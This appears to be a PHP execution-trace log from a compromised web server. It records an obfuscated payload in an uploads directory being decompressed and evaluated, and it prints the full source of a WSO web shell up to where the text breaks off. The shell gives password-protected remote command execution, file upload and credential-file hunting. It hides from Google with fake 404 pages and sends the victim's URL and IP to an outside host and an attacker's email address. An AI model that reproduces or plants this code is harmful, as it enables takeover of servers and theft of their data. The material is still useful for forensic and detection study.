3	9	R			'\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3	10	0	0.001257	461344	gzinflate	0		/var/www/html/uploads/cmd.php(4) : eval()'d code	1	1	'\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3	10	1	0.001737	485952
3	10	R			'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3	11	0	0.002185	453152	gzuncompress	0		/var/www/html/uploads/cmd.php(4) : eval()'d code	1	1	'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ﭢ�h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3	11	1	0.002907	539200
3	11	R			'<?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3	12	0	0.005625	1143752	eval	1	'?><?php\r\nfunction GetIP(){\r\n    if(getenv("HTTP_CLIENT_IP")) {\r\n        $ip = getenv("HTTP_CLIENT_IP");\r\n    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n        $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n        if (strstr($ip, \',\')) {\r\n            $tmp = explode (\',\', $ip);\r\n            $ip = trim($tmp[0]);\r\n        }\r\n    } else {\r\n        $ip = getenv("REMOTE_ADDR");\r\n    }\r\n    return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n    if($gitt == false){\r\n        @$gitt = file_get_contents($x);\r\n    }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n    @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo \'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. \'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n 